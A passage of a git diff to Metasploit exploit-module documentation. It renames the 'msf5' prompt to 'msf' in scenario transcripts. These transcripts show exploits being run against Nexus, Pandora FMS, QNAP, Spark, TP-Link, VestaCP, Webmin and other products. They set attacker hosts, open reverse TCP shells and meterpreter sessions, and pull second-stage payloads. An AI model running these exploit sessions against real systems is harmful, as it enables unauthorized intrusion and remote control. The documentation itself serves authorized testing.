3.21.1-01 from [Docker Hub](https://hub.docker.com/r/sonatype/nexus3) ``` -msf5 > use exploit/linux/http/nexus_repo_manager_el_injection -msf5 exploit(linux/http/nexus_repo_manager_el_injection) > options +msf > use exploit/linux/http/nexus_repo_manager_el_injection +msf exploit(linux/http/nexus_repo_manager_el_injection) > options Module options (exploit/linux/http/nexus_repo_manager_el_injection): @@ -119,13 +119,13 @@ Exploit target: 0 Nexus Repository Manager <= 3.21.1 -msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set rhosts 127.0.0.1 +msf exploit(linux/http/nexus_repo_manager_el_injection) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set password admin +msf exploit(linux/http/nexus_repo_manager_el_injection) > set password admin password => admin -msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set lhost 192.168.1.3 +msf exploit(linux/http/nexus_repo_manager_el_injection) > set lhost 192.168.1.3 lhost => 192.168.1.3 -msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run +msf exploit(linux/http/nexus_repo_manager_el_injection) > run [*] Started reverse TCP handler on 192.168.1.3:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/linux/http/pandora_fms_events_exec.md b/documentation/modules/exploit/linux/http/pandora_fms_events_exec.md index b46447ac4a..1880695925 100644 --- a/documentation/modules/exploit/linux/http/pandora_fms_events_exec.md +++ b/documentation/modules/exploit/linux/http/pandora_fms_events_exec.md @@ -49,7 +49,7 @@ The username for the Pandora FMS account to authenticate with. This option is re ## Scenarios ### Pandora FMS 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version). Target: Linux (x64) ``` -msf5 exploit(linux/http/pandora_fms_events_exec) > show options +msf exploit(linux/http/pandora_fms_events_exec) > show options Module options (exploit/linux/http/pandora_fms_events_exec): @@ -84,7 +84,7 @@ Exploit target: 1 Linux (x64) -msf5 exploit(linux/http/pandora_fms_events_exec) > exploit +msf exploit(linux/http/pandora_fms_events_exec) > exploit [*] Started reverse TCP handler on 192.168.1.12:4444 [+] Authenticated as user admin. @@ -101,7 +101,7 @@ meterpreter > ``` ### Pandora FMS 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version). Target: Linux (cmd) ``` -msf5 exploit(linux/http/pandora_fms_events_exec) > exploit +msf exploit(linux/http/pandora_fms_events_exec) > exploit [*] Started reverse TCP handler on 192.168.1.12:4444 [+] Authenticated as user admin. diff --git a/documentation/modules/exploit/linux/http/pandora_ping_cmd_exec.md b/documentation/modules/exploit/linux/http/pandora_ping_cmd_exec.md index fa926e8443..4d0e564ce6 100644 --- a/documentation/modules/exploit/linux/http/pandora_ping_cmd_exec.md +++ b/documentation/modules/exploit/linux/http/pandora_ping_cmd_exec.md @@ -44,18 +44,18 @@ https://pandorafms.com/docs/index.php?title=Pandora:Documentation_en:Installing Tested Pandora FMS 7.0 NG on CentOS 7.3.1611 ``` -msf5 > use exploit/linux/http/pandora_ping_cmd_exec -msf5 exploit(linux/http/pandora_ping_cmd_exec) > set RHOSTS 192.168.215.128 +msf > use exploit/linux/http/pandora_ping_cmd_exec +msf exploit(linux/http/pandora_ping_cmd_exec) > set RHOSTS 192.168.215.128 RHOSTS => 192.168.215.128 -msf5 exploit(linux/http/pandora_ping_cmd_exec) > set RHOSTS 192.168.1.12 +msf exploit(linux/http/pandora_ping_cmd_exec) > set RHOSTS 192.168.1.12 RHOSTS => 192.168.1.12 -msf5 exploit(linux/http/pandora_ping_cmd_exec) > set LHOST 192.168.1.5 +msf exploit(linux/http/pandora_ping_cmd_exec) > set LHOST 192.168.1.5 LHOST => 192.168.1.5 -msf5 exploit(linux/http/pandora_ping_cmd_exec) > set USERNAME admin +msf exploit(linux/http/pandora_ping_cmd_exec) > set USERNAME admin USERNAME => admin -msf5 exploit(linux/http/pandora_ping_cmd_exec) > set PASSWORD pandora +msf exploit(linux/http/pandora_ping_cmd_exec) > set PASSWORD pandora PASSWORD => pandora -msf5 exploit(linux/http/pandora_ping_cmd_exec) > exploit +msf exploit(linux/http/pandora_ping_cmd_exec) > exploit [*] Started reverse TCP handler on 192.168.1.5:4444 [*] Exploiting... diff --git a/documentation/modules/exploit/linux/http/panos_readsessionvars.md b/documentation/modules/exploit/linux/http/panos_readsessionvars.md index a44a50cc1e..21b657746c 100644 --- a/documentation/modules/exploit/linux/http/panos_readsessionvars.md +++ b/documentation/modules/exploit/linux/http/panos_readsessionvars.md @@ -32,7 +32,7 @@ This VM is not generally available, but the specific disk image used was `PA-VM- ## Scenarios ``` -msf5 exploit(linux/http/panos_readsessionvars) > exploit +msf exploit(linux/http/panos_readsessionvars) > exploit [*] Started reverse TCP handler on 192.168.122.1:4444 [*] Creating our corrupted session ID... diff --git a/documentation/modules/exploit/linux/http/php_imap_open_rce.md b/documentation/modules/exploit/linux/http/php_imap_open_rce.md index 972090ab16..2115155f74 100644 --- a/documentation/modules/exploit/linux/http/php_imap_open_rce.md +++ b/documentation/modules/exploit/linux/http/php_imap_open_rce.md @@ -430,14 +430,14 @@ Make sure `php-imap` is installed and enabled. Create `imap.php` with the follo Using the `imap.php` page listed above. ``` - msf5 > use exploit/linux/http/php_imap_open_rce - msf5 exploit(linux/http/php_imap_open_rce) > set target 3 + msf > use exploit/linux/http/php_imap_open_rce + msf exploit(linux/http/php_imap_open_rce) > set target 3 target => 3 - msf5 exploit(linux/http/php_imap_open_rce) > set lhost 1.1.1.1 + msf exploit(linux/http/php_imap_open_rce) > set lhost 1.1.1.1 lhost => 1.1.1.1 - msf5 exploit(linux/http/php_imap_open_rce) > set rhost 2.2.2.2 + msf exploit(linux/http/php_imap_open_rce) > set rhost 2.2.2.2 rhost => 2.2.2.2 - msf5 exploit(linux/http/php_imap_open_rce) > exploit + msf exploit(linux/http/php_imap_open_rce) > exploit [*] Started reverse TCP handler on 1.1.1.1:4444 [*] Listener started for 300 seconds diff --git a/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md index a8a7d668f0..9cede0e79f 100644 --- a/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md +++ b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md @@ -29,9 +29,9 @@ the `auxiliary/gather/pulse_secure_file_disclosure` module. ## Usage ``` -msf5 exploit(linux/http/pulse_secure_cmd_exec) > set sid 676f5f892e8c4a6419f10564f9e9d857 +msf exploit(linux/http/pulse_secure_cmd_exec) > set sid 676f5f892e8c4a6419f10564f9e9d857 sid => 676f5f892e8c4a6419f10564f9e9d857 -msf5 exploit(linux/http/pulse_secure_cmd_exec) > run +msf exploit(linux/http/pulse_secure_cmd_exec) > run [*] Started reverse TCP handler on 127.0.0.1:[redacted] [+] Setting session cookie: DSID=676f5f892e8c4a6419f10564f9e9d857 diff --git a/documentation/modules/exploit/linux/http/qnap_qcenter_change_passwd_exec.md b/documentation/modules/exploit/linux/http/qnap_qcenter_change_passwd_exec.md index 792f3c5685..7fa2b780b7 100644 --- a/documentation/modules/exploit/linux/http/qnap_qcenter_change_passwd_exec.md +++ b/documentation/modules/exploit/linux/http/qnap_qcenter_change_passwd_exec.md @@ -48,16 +48,16 @@ ## Scenarios ``` - msf5 > use exploit/linux/http/qnap_qcenter_change_passwd_exec - msf5 exploit(linux/http/qnap_qcenter_change_passwd_exec) > set rhosts 10.1.1.112 + msf > use exploit/linux/http/qnap_qcenter_change_passwd_exec + msf exploit(linux/http/qnap_qcenter_change_passwd_exec) > set rhosts 10.1.1.112 rhosts => 10.1.1.112 - msf5 exploit(linux/http/qnap_qcenter_change_passwd_exec) > set verbose true + msf exploit(linux/http/qnap_qcenter_change_passwd_exec) > set verbose true verbose => true - msf5 exploit(linux/http/qnap_qcenter_change_passwd_exec) > check + msf exploit(linux/http/qnap_qcenter_change_passwd_exec) > check [*] Target is QNAP Q'Center appliance version 1.6.1075 [*] 10.1.1.112:443 The target appears to be vulnerable. - msf5 exploit(linux/http/qnap_qcenter_change_passwd_exec) > run + msf exploit(linux/http/qnap_qcenter_change_passwd_exec) > run [*] Started reverse TCP handler on 10.1.1.197:4444 [*] Target is QNAP Q'Center appliance version 1.6.1075 diff --git a/documentation/modules/exploit/linux/http/rconfig_ajaxarchivefiles_rce.md b/documentation/modules/exploit/linux/http/rconfig_ajaxarchivefiles_rce.md index 8e5c102b50..8bce99a98f 100644 --- a/documentation/modules/exploit/linux/http/rconfig_ajaxarchivefiles_rce.md +++ b/documentation/modules/exploit/linux/http/rconfig_ajaxarchivefiles_rce.md @@ -22,7 +22,7 @@ Tips : once you get a shell, look at the CVE-2019-19585. You will probably get r ## Scenarios ``` -msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > show options +msf exploit(linux/http/rconfig_ajaxarchivefiles_rce) > show options Module options (exploit/linux/http/rconfig_ajaxarchivefiles_rce): @@ -50,12 +50,12 @@ Exploit target: -- ---- 0 Auto -msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > set RHOSTS 1.1.1.1 +msf exploit(linux/http/rconfig_ajaxarchivefiles_rce) > set RHOSTS 1.1.1.1 RHOSTS => 1.1.1.1 -msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > set LHOST 1.1.1.2 +msf exploit(linux/http/rconfig_ajaxarchivefiles_rce) > set LHOST 1.1.1.2 LHOST => 1.1.1.2 -msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > +msf exploit(linux/http/rconfig_ajaxarchivefiles_rce) > [+] rConfig version 3.9 detected [+] New temporary user 6QpO8mLt created [+] Authenticated as user 6QpO8mLt @@ -63,7 +63,7 @@ msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > [+] Command successfully executed [*] User 6QpO8mLt removed successfully ! -msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > sessions -i 1 +msf exploit(linux/http/rconfig_ajaxarchivefiles_rce) > sessions -i 1 [*] Starting interaction with 1... id uid=48(apache) gid=48(apache) groups=48(apache) diff --git a/documentation/modules/exploit/linux/http/spark_unauth_rce.md b/documentation/modules/exploit/linux/http/spark_unauth_rce.md index 19e832554a..fa79ed2d2b 100644 --- a/documentation/modules/exploit/linux/http/spark_unauth_rce.md +++ b/documentation/modules/exploit/linux/http/spark_unauth_rce.md @@ -27,32 +27,32 @@ https://github.com/vulhub/vulhub/tree/master/spark/unacc ### Spark 2.3.1 ``` -msf5 > use exploit/linux/http/spark_unauth_rce -msf5 exploit(linux/http/spark_unauth_rce) > set rhosts 127.0.0.1 +msf > use exploit/linux/http/spark_unauth_rce +msf exploit(linux/http/spark_unauth_rce) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(linux/http/spark_unauth_rce) > set rport 6066 +msf exploit(linux/http/spark_unauth_rce) > set rport 6066 rport => 6066 -msf5 exploit(linux/http/spark_unauth_rce) > set srvhost 10.139.14.167 +msf exploit(linux/http/spark_unauth_rce) > set srvhost 10.139.14.167 srvhost => 10.139.14.167 -msf5 exploit(linux/http/spark_unauth_rce) > set srvport 9999 +msf exploit(linux/http/spark_unauth_rce) > set srvport 9999 srvport => 9999 -msf5 exploit(linux/http/spark_unauth_rce) > set payload java/meterpreter/reverse_tcp +msf exploit(linux/http/spark_unauth_rce) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp -msf5 exploit(linux/http/spark_unauth_rce) > set lhost 10.139.14.167 +msf exploit(linux/http/spark_unauth_rce) > set lhost 10.139.14.167 lhost => 10.139.14.167 -msf5 exploit(linux/http/spark_unauth_rce) > set lport 5555 +msf exploit(linux/http/spark_unauth_rce) > set lport 5555 lport => 5555 -msf5 exploit(linux/http/spark_unauth_rce) > exploit +msf exploit(linux/http/spark_unauth_rce) > exploit [*] Exploit running as background job 3. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 10.139.14.167:5555 -msf5 exploit(linux/http/spark_unauth_rce) > [*] Starting up our web service ... +msf exploit(linux/http/spark_unauth_rce) > [*] Starting up our web service ... [*] Using URL: http://10.139.14.167:9999/feTYHNiHufrGI [*] 127.0.0.1:6066 - Sending the payload to the server... [*] Sending stage (53867 bytes) to 10.139.14.167 [*] Meterpreter session 2 opened (10.139.14.167:5555 -> 10.139.14.167:56021) at 2018-11-12 16:59:33 +0800 -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions +msf exploit(linux/http/apache_couchdb_cmd_exec) > sessions Active sessions =============== @@ -61,7 +61,7 @@ Active sessions -- ---- ---- ----------- ---------- 2 meterpreter java/linux root @ 96b2135aee9c 10.139.14.167:5555 -> 10.139.14.167:56021 (127.0.0.1) -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -i 2 +msf exploit(linux/http/apache_couchdb_cmd_exec) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getuid diff --git a/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md b/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md index 893a2492b7..8335f9ba67 100644 --- a/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md +++ b/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md @@ -171,7 +171,7 @@ Wfsdelay needs to be at least a couple seconds to allow for payload download and This unit's version was not able to be determined automatically. `forceexploit` was set to `true` to enable it to run. ``` -msf5 exploit(linux/http/synology_dsm_smart_exec_auth) > run +msf exploit(linux/http/synology_dsm_smart_exec_auth) > run [*] Started reverse TCP handler on 192.168.135.168:4567 [*] Trying to detect installed version diff --git a/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md b/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md index 03f2aedf90..6a82e98a60 100644 --- a/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md +++ b/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md @@ -62,25 +62,25 @@ The web interface password for the specified username Target = 0 (TP-Link NC200, NC220, NC230, NC250) ``` -msf5 > use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection +msf > use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection [*] No payload configured, defaulting to linux/mipsle/meterpreter/reverse_tcp -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rhost 192.168.0.1 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rhost 192.168.0.1 rhost => 192.168.0.1 -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rport 80 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rport 80 rport => 80 -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set target 0 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set target 0 target => 0 -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set username admin +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set username admin username => admin -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set password password +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set password password password => password -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set payload linux/mipsle/shell/reverse_tcp +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set payload linux/mipsle/shell/reverse_tcp payload => linux/mipsle/shell/reverse_tcp -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lhost 192.168.0.254 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lhost 192.168.0.254 lhost => 192.168.0.254 -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lport 5555 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lport 5555 lport => 5555 -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit [*] Started reverse TCP handler on 192.168.0.254:6666 [*] Authenticating with admin:YWRtaW4= ... @@ -102,25 +102,25 @@ msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit Target = 1 (TP-Link NC260, NC450) ``` -msf5 > use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection +msf > use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection [*] No payload configured, defaulting to linux/mipsle/meterpreter/reverse_tcp -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rhost 192.168.0.1 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rhost 192.168.0.1 rhost => 192.168.0.1 -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rport 443 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rport 443 rport => 443 -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set target 1 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set target 1 target => 1 -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set username admin +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set username admin username => admin -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set password password +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set password password password => password -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set payload linux/mipsle/shell/reverse_tcp +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set payload linux/mipsle/shell/reverse_tcp payload => linux/mipsle/shell/reverse_tcp -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lhost 192.168.0.254 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lhost 192.168.0.254 lhost => 192.168.0.254 -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lport 5555 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lport 5555 lport => 5555 -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit [*] Started reverse TCP handler on 192.168.0.254:5555 [*] Authenticating with admin:0b8b946432f1ac91f0b07bd5f8df6587 ... diff --git a/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md b/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md index f277aed746..be1ba4a332 100644 --- a/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md +++ b/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md @@ -72,19 +72,19 @@ contain any special characters. ### Trend Micro Web Security 6.5-SP2_Build_Linux_1852 ``` -msf5 > use exploit/linux/http/trendmicro_websecurity_exec -msf5 exploit(linux/http/trendmicro_websecurity_exec) > set RHOSTS 192.168.74.31 +msf > use exploit/linux/http/trendmicro_websecurity_exec +msf exploit(linux/http/trendmicro_websecurity_exec) > set RHOSTS 192.168.74.31 RHOSTS => 192.168.74.31 -msf5 exploit(linux/http/trendmicro_websecurity_exec) > set LHOST 172.31.224.186 +msf exploit(linux/http/trendmicro_websecurity_exec) > set LHOST 172.31.224.186 LHOST => 172.31.224.186 -msf5 exploit(linux/http/trendmicro_websecurity_exec) > check +msf exploit(linux/http/trendmicro_websecurity_exec) > check [*] Trying to extract session ID by exploiting reverse proxy service [+] Extracted number of JSESSIONID : 16 [*] Testing JSESSIONID #0 : 132B2651F070E865A646F3ABA681769A [+] Awesome !!! JESSIONID #0 is active. [+] 192.168.74.31:8443 - The target is vulnerable. -msf5 exploit(linux/http/trendmicro_websecurity_exec) > run +msf exploit(linux/http/trendmicro_websecurity_exec) > run [*] Started reverse TCP handler on 172.31.224.186:4444 [*] Trying to extract session ID by exploiting reverse proxy service diff --git a/documentation/modules/exploit/linux/http/ueb_api_rce.md b/documentation/modules/exploit/linux/http/ueb_api_rce.md index 7ffdcbd305..4c625675b4 100644 --- a/documentation/modules/exploit/linux/http/ueb_api_rce.md +++ b/documentation/modules/exploit/linux/http/ueb_api_rce.md @@ -22,14 +22,14 @@ This exploit has two targets: ### UEB 9.2 on CentOS 6.5 Using api/storage (target 0) root exploit ``` -msf5 > use exploit/linux/http/ueb_api_rce -msf5 exploit(linux/http/ueb_api_rce) > set target 0 +msf > use exploit/linux/http/ueb_api_rce +msf exploit(linux/http/ueb_api_rce) > set target 0 target => 0 -msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1 +msf exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1 rhost => 1.1.1.1 -msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2 +msf exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2 lhost => 2.2.2.2 -msf5 exploit(linux/http/ueb_api_rce) > exploit +msf exploit(linux/http/ueb_api_rce) > exploit [*] Started reverse TCP handler on 2.2.2.2:4444 [*] 1.1.1.1:443 - Sending requests to UEB... @@ -56,14 +56,14 @@ Server username: uid=0, gid=0, euid=0, egid=0 ### UEB 9.2 on CentOS 6.5 Using api/hosts (target 1) exploit ``` -msf5 > use exploit/linux/http/ueb_api_rce -msf5 exploit(linux/http/ueb_api_rce) > set target 1 +msf > use exploit/linux/http/ueb_api_rce +msf exploit(linux/http/ueb_api_rce) > set target 1 target => 1 -msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1 +msf exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1 rhost => 1.1.1.1 -msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2 +msf exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2 lhost => 2.2.2.2 -msf5 exploit(linux/http/ueb_api_rce) > exploit +msf exploit(linux/http/ueb_api_rce) > exploit [*] Started reverse TCP handler on 2.2.2.2:4444 [*] 1.1.1.1:443 - Sending requests to UEB... diff --git a/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md b/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md index 6993e9a4ae..a2d6f1b60b 100644 --- a/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md +++ b/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md @@ -30,12 +30,12 @@ according to the [UnRAID Getting Started](https://wiki.unraid.net/UnRAID_6/Getti ## Scenarios ``` -msf5 > use exploit/linux/http/unraid_auth_bypass_exec.rb -msf5 exploit(linux/http/unraid_auth_bypass_exec) > set RHOSTS 10.10.0.173 +msf > use exploit/linux/http/unraid_auth_bypass_exec.rb +msf exploit(linux/http/unraid_auth_bypass_exec) > set RHOSTS 10.10.0.173 RHOSTS => 10.10.0.173 -msf5 exploit(linux/http/unraid_auth_bypass_exec) > check +msf exploit(linux/http/unraid_auth_bypass_exec) > check [*] 10.10.0.173:80 - The target appears to be vulnerable. -msf5 exploit(linux/http/unraid_auth_bypass_exec) > run +msf exploit(linux/http/unraid_auth_bypass_exec) > run [*] Started reverse TCP handler on 10.10.0.161:4444 [*] Sending stage (38288 bytes) to 10.10.0.173 diff --git a/documentation/modules/exploit/linux/http/vestacp_exec.md b/documentation/modules/exploit/linux/http/vestacp_exec.md index 00ddc890d3..596ea42e94 100644 --- a/documentation/modules/exploit/linux/http/vestacp_exec.md +++ b/documentation/modules/exploit/linux/http/vestacp_exec.md @@ -62,26 +62,26 @@ A successful check of the exploit will look similar to the output shown below: ## Ubuntu 18.04 LTS with VestaCP 0.9.26 ``` -msf5 > use exploit/linux/http/vestacp_exec -msf5 exploit(linux/http/vestacp_exec) > set RHOSTS 192.168.74.218 +msf > use exploit/linux/http/vestacp_exec +msf exploit(linux/http/vestacp_exec) > set RHOSTS 192.168.74.218 RHOSTS => 192.168.74.218 -msf5 exploit(linux/http/vestacp_exec) > set USERNAME user11 +msf exploit(linux/http/vestacp_exec) > set USERNAME user11 USERNAME => user11 -msf5 exploit(linux/http/vestacp_exec) > set PASSWORD qwe123 +msf exploit(linux/http/vestacp_exec) > set PASSWORD qwe123 PASSWORD => qwe123 -msf5 exploit(linux/http/vestacp_exec) > set LHOST 192.168.74.1 +msf exploit(linux/http/vestacp_exec) > set LHOST 192.168.74.1 LHOST => 192.168.74.1 -msf5 exploit(linux/http/vestacp_exec) > set SRVHOST 192.168.74.1 +msf exploit(linux/http/vestacp_exec) > set SRVHOST 192.168.74.1 SRVHOST => 192.168.74.1 -msf5 exploit(linux/http/vestacp_exec) > set SRVPORT 8081 +msf exploit(linux/http/vestacp_exec) > set SRVPORT 8081 SRVPORT => 8081 -msf5 exploit(linux/http/vestacp_exec) > run +msf exploit(linux/http/vestacp_exec) > run [*] Exploit running as background job 32. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.74.1:4444 [*] 192.168.74.218:8083 - Using URL: http://192.168.74.1:8081/poSeL7s -msf5 exploit(linux/http/vestacp_exec) > [*] 192.168.74.218:8083 - Second payload download URI is http://192.168.74.1:8081/poSeL7s +msf exploit(linux/http/vestacp_exec) > [*] 192.168.74.218:8083 - Second payload download URI is http://192.168.74.1:8081/poSeL7s [+] 192.168.74.218:21 - Successfully authenticated to the FTP service [+] 192.168.74.218:21 - The file with the payload in the file name has been successfully uploaded. [*] 192.168.74.218:8083 - Retrieving cookie and csrf token values @@ -104,7 +104,7 @@ msf5 exploit(linux/http/vestacp_exec) > [*] 192.168.74.218:8083 - Second payload [*] Sending stage (53755 bytes) to 192.168.74.218 [*] Meterpreter session 8 opened (192.168.74.1:4444 -> 192.168.74.218:58790) at 2020-04-11 14:35:23 +0300 -msf5 exploit(linux/http/vestacp_exec) > sessions -i 8 +msf exploit(linux/http/vestacp_exec) > sessions -i 8 [*] Starting interaction with 8... meterpreter > shell diff --git a/documentation/modules/exploit/linux/http/webmin_backdoor.md b/documentation/modules/exploit/linux/http/webmin_backdoor.md index 6ae95ce3f7..687edb4575 100644 --- a/documentation/modules/exploit/linux/http/webmin_backdoor.md +++ b/documentation/modules/exploit/linux/http/webmin_backdoor.md @@ -78,7 +78,7 @@ Set this to `true` to override the `check` result during exploitation. ## Usage ``` -msf5 exploit(linux/http/webmin_backdoor) > run +msf exploit(linux/http/webmin_backdoor) > run [*] Started reverse TCP handler on 172.28.128.1:4444 [*] Webmin 1.890 detected @@ -95,9 +95,9 @@ uname -a Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux ^Z Background session 1? [y/N] y -msf5 exploit(linux/http/webmin_backdoor) > set target 1 +msf exploit(linux/http/webmin_backdoor) > set target 1 target => 1 -msf5 exploit(linux/http/webmin_backdoor) > run +msf exploit(linux/http/webmin_backdoor) > run [*] Started reverse TCP handler on 172.28.128.1:4444 [*] Webmin 1.890 detected diff --git a/documentation/modules/exploit/linux/http/webmin_packageup_rce.md b/documentation/modules/exploit/linux/http/webmin_packageup_rce.md index 06fd7b717a..f4704f1c23 100644 --- a/documentation/modules/exploit/linux/http/webmin_packageup_rce.md +++ b/documentation/modules/exploit/linux/http/webmin_packageup_rce.md @@ -20,23 +20,23 @@ This module has been tested with [Webmin 1.910](https://sourceforge.net/projects ### Tested Webmin 1.910 on Debian Linux 4.19.28-2kali1 x64 ``` -msf5 > -msf5 > use exploit/linux/http/webmin_packageup_rce -msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 192.168.1.9 +msf > +msf > use exploit/linux/http/webmin_packageup_rce +msf exploit(linux/http/webmin_packageup_rce) > set RHOSTS 192.168.1.9 RHOSTS => 192.168.1.9 -msf5 exploit(linux/http/webmin_packageup_rce) > set PAYLOAD cmd/unix/reverse_python +msf exploit(linux/http/webmin_packageup_rce) > set PAYLOAD cmd/unix/reverse_python PAYLOAD => cmd/unix/reverse_python -msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST 192.168.1.12 +msf exploit(linux/http/webmin_packageup_rce) > set LHOST 192.168.1.12 LHOST => 192.168.1.12 -msf5 exploit(linux/http/webmin_packageup_rce) > set USERNAME rce +msf exploit(linux/http/webmin_packageup_rce) > set USERNAME rce USERNAME => rce -msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD password +msf exploit(linux/http/webmin_packageup_rce) > set PASSWORD password PASSWORD => password -msf5 exploit(linux/http/webmin_packageup_rce) > check +msf exploit(linux/http/webmin_packageup_rce) > check [*] NICE! rce has the right to >>Package Update<< [+] 192.168.1.9:10000 - The target is vulnerable. -msf5 exploit(linux/http/webmin_packageup_rce) > exploit +msf exploit(linux/http/webmin_packageup_rce) > exploit [*] Started reverse TCP handler on 192.168.1.12:4444 [+] Session cookie: 1947b5dfd62403b8f1f58f497e88b1e5 diff --git a/documentation/modules/exploit/linux/http/wepresent_cmd_injection.md b/documentation/modules/exploit/linux/http/wepresent_cmd_injection.md index ceb0ff2a35..4f88bd9c14 100644 --- a/documentation/modules/exploit/linux/http/wepresent_cmd_injection.md +++ b/documentation/modules/exploit/linux/http/wepresent_cmd_injection.md @@ -35,14 +35,14 @@ The following devices are known to be affected by this issue: #### Meterpreter ``` -msf5 > use exploit/linux/http/wepresent_cmd_injection -msf5 exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246 +msf > use exploit/linux/http/wepresent_cmd_injection +msf exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246 RHOSTS => 10.12.70.246 -msf5 exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238 +msf exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238 LHOST => 10.12.70.238 -msf5 exploit(linux/http/wepresent_cmd_injection) > check +msf exploit(linux/http/wepresent_cmd_injection) > check [+] 10.12.70.246:443 - The target is vulnerable. -msf5 exploit(linux/http/wepresent_cmd_injection) > run +msf exploit(linux/http/wepresent_cmd_injection) > run [*] 